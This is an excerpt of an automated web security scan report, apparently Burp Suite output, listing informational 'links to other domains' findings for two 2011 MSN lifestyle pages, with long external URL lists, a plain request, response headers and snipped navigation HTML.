</a><a href="http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.redacted&go=&form=MSN037">Dress Your Body</a><a href="http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=motherhood+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=ask+ying+site%3Alifestyle.redacted&form=MSN037">Ask Ying</a><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&go=&form=MSN037">Winter Boots</a>
...[SNIP]...
</a><a href="http://www.bing.com/search?q=small+spaces+site%3Alifestyle.redacted&go=&form=MSN037">Small Spaces</a><a href="http://www.bing.com/search?q=nail+colors+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037">Curly Hairstyles</a><span class="custom2"><a href="http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.redacted&go=&form=MSN037">Men's Style</a></span><a href="http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.redacted&go=&form=MSN037">Expert Makeup Tricks</a><a href="http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.redacted&go=&form=MSN037">Quick Cleaning Tips</a><a href="http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=baby+names+site%3Alifestyle.redacted&go=&form=MSN037">Baby Names</a><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&go=&form=MSN037">Kissing</a></span></a><a href="http://www.bing.com/search?q=winter+decor+site%3Alifestyle.redacted&go=&form=MSN037">Winter Decor</a><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2"><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=winter+coats+site%3Alifestyle.redacted&go=&form=MSN037">Winter Coats</a>
...[SNIP]...
<div id="subfoot"><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...

22.105. http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-home/room-design/staticslideshowhb.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx?cp-documentid=26867784&gt1=32067

The response contains the following links to other domains:

http://ads.hearstmags.com/ams/api.js?pos_name=AMS_MSN_HOST_HBU_585X368
http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.delish.com/
http://msn.delish.com/?ocid=lifestylehp
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportallifestyle.112.2o7.net/b/ss/msnportallifestyle/1/H.1--NS/0
http://twitter.com/share
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=ALS
http://www.bing.com/search?form=ALS&q=
http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=ask+ying+site%3Alifestyle.redacted&form=MSN037
http://www.bing.com/search?q=baby+names+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24
http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24
http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=motherhood+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=nail+colors+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24
http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24
http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=small+spaces+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+coats+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+decor+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/travel?cid=msn_lifestyle_nav
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.delish.com/cooking-shows/food-tv/super-bowl-sunday-recipes-nfl
http://www.housebeautiful.com/?link=lgo&dom=msn&tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&src=syn&con=slide&mag=hbu
http://www.housebeautiful.com/decorating/beautiful-designer-bedrooms?link=msn%3ABeautiful%20Designer%20Bedrooms%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&dom=msn&tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&src=syn&con=slide&mag=hbu
http://www.housebeautiful.com/decorating/decorating-secrets?link=msn%3A20%20Decorating%20Secrets%20No%20One%20Ever%20Told%20You%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&dom=msn&tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&src=syn&con=slide&mag=hbu
http://www.housebeautiful.com/decorating/home-makeovers/101-makeover-ideas-0209?link=msn%3APopular%20Home%20Makeover%20Ideas%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&dom=msn&tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&src=syn&con=slide&mag=hbu
http://www.housebeautiful.com/kitchens/small-kitchens?link=msn%3A14%20Clever%20Tricks%20for%20Tiny%20Kitchens%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&dom=msn&tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&src=syn&con=slide&mag=hbu
http://www.housebeautiful.com/video/?link=msn%3ATour%20the%20Kitchen%20of%20the%20Year%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&dom=msn&tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&src=syn&con=slide&mag=hbu
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406215&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-home%2Froom-design%2Fstaticslideshowhb.aspx%3Fcp-documentid%3D26867784%26gt1%3D32067&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:50:15 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA10
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a47aede89c61466cb6943852556f27e6; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=EA4FE35D24D7426BAA37AF56D0CB2642; domain=.redacted; expires=Thu, 18-Aug-2011 16:50:15 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 37466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406215&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-home%2Froom-design%2Fstaticslideshowhb.aspx%3Fcp-documentid%3D26867784%26gt1%3D32067&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li class="first"><a href="http://msn.delish.com/">Food & Entertaining</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<div class="logo"><a href="http://www.housebeautiful.com?link=lgo&dom=msn&tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&src=syn&con=slide&mag=hbu"><img src="http://blstb.redacted/i/36/A314E87A94101ACD9DADF33B27E6.jpg" width="90" height="30" alt="House Beautiful" />
...[SNIP]...
<li class="first"><a href="http://www.housebeautiful.com/decorating/beautiful-designer-bedrooms?link=msn%3ABeautiful%20Designer%20Bedrooms%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&dom=msn&tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&src=syn&con=slide&mag=hbu">Beautiful Designer Bedrooms</a>
...[SNIP]...
<li class=""><a href="http://www.housebeautiful.com/decorating/decorating-secrets?link=msn%3A20%20Decorating%20Secrets%20No%20One%20Ever%20Told%20You%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&dom=msn&tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&src=syn&con=slide&mag=hbu">20 Decorating Secrets No One Ever Told You</a>
...[SNIP]...
<li class=""><a href="http://www.housebeautiful.com/decorating/home-makeovers/101-makeover-ideas-0209?link=msn%3APopular%20Home%20Makeover%20Ideas%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&dom=msn&tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&src=syn&con=slide&mag=hbu">Popular Home Makeover Ideas</a>
...[SNIP]...
<li class=""><a href="http://www.housebeautiful.com/kitchens/small-kitchens?link=msn%3A14%20Clever%20Tricks%20for%20Tiny%20Kitchens%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&dom=msn&tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&src=syn&con=slide&mag=hbu">14 Clever Tricks for Tiny Kitchens</a>
...[SNIP]...
<li class="last"><a href="http://www.housebeautiful.com/video/#v180458534001?link=msn%3ATour%20the%20Kitchen%20of%20the%20Year%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&dom=msn&tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&src=syn&con=slide&mag=hbu">Tour the Kitchen of the Year</a>
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx?cp-documentid=26867784&imageindex=1&OCID=TWT">Tweet</a>
...[SNIP]...
<li><a href="http://www.delish.com/cooking-shows/food-tv/super-bowl-sunday-recipes-nfl">NFL Mom's High-Scoring Recipes </a>
...[SNIP]...
<div class="child c1 first"><script src="http://ads.hearstmags.com/ams/api.js?pos_name=AMS_MSN_HOST_HBU_585X368" type="text/javascript"></script>
...[SNIP]...
<div id="seemore" class="cf" ><a href="http://www.bing.com/search?form=ALS&q=">See more results</a>
...[SNIP]...
<span class="custom3"><a href="http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037">Valentine's Day</a></span><a href="http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.redacted&go=&form=MSN037">Winter Fashions</a><a href="http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.redacted&go=&form=MSN037">Dress Your Body</a><a href="http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=motherhood+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=ask+ying+site%3Alifestyle.redacted&form=MSN037">Ask Ying</a><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&go=&form=MSN037">Winter Boots</a>
...[SNIP]...
</a><a href="http://www.bing.com/search?q=small+spaces+site%3Alifestyle.redacted&go=&form=MSN037">Small Spaces</a><a href="http://www.bing.com/search?q=nail+colors+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037">Curly Hairstyles</a><span class="custom2"><a href="http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.redacted&go=&form=MSN037">Men's Style</a></span><a href="http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.redacted&go=&form=MSN037">Expert Makeup Tricks</a><a href="http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.redacted&go=&form=MSN037">Quick Cleaning Tips</a><a href="http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=baby+names+site%3Alifestyle.redacted&go=&form=MSN037">Baby Names</a><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&go=&form=MSN037">Kissing</a></span></a><a href="http://www.bing.com/search?q=winter+decor+site%3Alifestyle.redacted&go=&form=MSN037">Winter Decor</a><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2"><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=winter+coats+site%3Alifestyle.redacted&go=&form=MSN037">Winter Coats</a>
...[SNIP]...
<div id="subfoot"><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...

22.106. http://lifestyle.redacted/your-life/family-parenting/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-life/family-parenting/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://lifestyle.redacted/your-life/family-parenting/article.aspx?cp-documentid=27352384&gt1=32060

The response contains the following links to other domains:

http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://community.thebump.com/cs/ks/forums/5039437/ShowForum.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-Chat%20with%20other%20new%20moms%20now
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.delish.com/?ocid=lifestylehp
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportallifestyle.112.2o7.net/b/ss/msnportallifestyle/1/H.1--NS/0
http://pregnant.thebump.com/new-mom-new-dad/your-life/articles/five-moms-you-will-meet-online.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-8%20moms%20youll%20meet%20online
http://pregnant.thebump.com/new-mom-new-dad/your-life/articles/fun-ways-to-lose-the-baby-weight.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-lose%20the%20baby%20weight
http://pregnant.thebump.com/pregnancy-baby-message-boards.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-New%20dad
http://pregnant.thebump.com/toddler.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-50%20things%20about%20toddler
http://twitter.com/MSNParenting
http://twitter.com/share
http://www.bing.com/?FORM=MSNS71
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=ALS
http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=ask+ying+site%3Alifestyle.redacted&form=MSN037
http://www.bing.com/search?q=baby+names+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24
http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24
http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=motherhood+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=nail+colors+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24
http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24
http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=small+spaces+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+coats+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+decor+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/travel?cid=msn_lifestyle_nav
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/MSNLife
http://www.myhomeredacted/
http://www.thebump.com/?cm_mmc=TB-_-MSN-_-tb%20logo-_-none
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344847&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-life%2Ffamily-parenting%2Farticle.aspx%3Fcp-documentid%3D27352384%26gt1%3D32060&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm

Request

GET /your-life/family-parenting/article.aspx?cp-documentid=27352384&gt1=32060 HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:27 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA10
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=708c46c2de6a4adaa8f33981559353a2; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=151C902562754AB1AE9AA3C81E148BA9; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:27 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 44821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
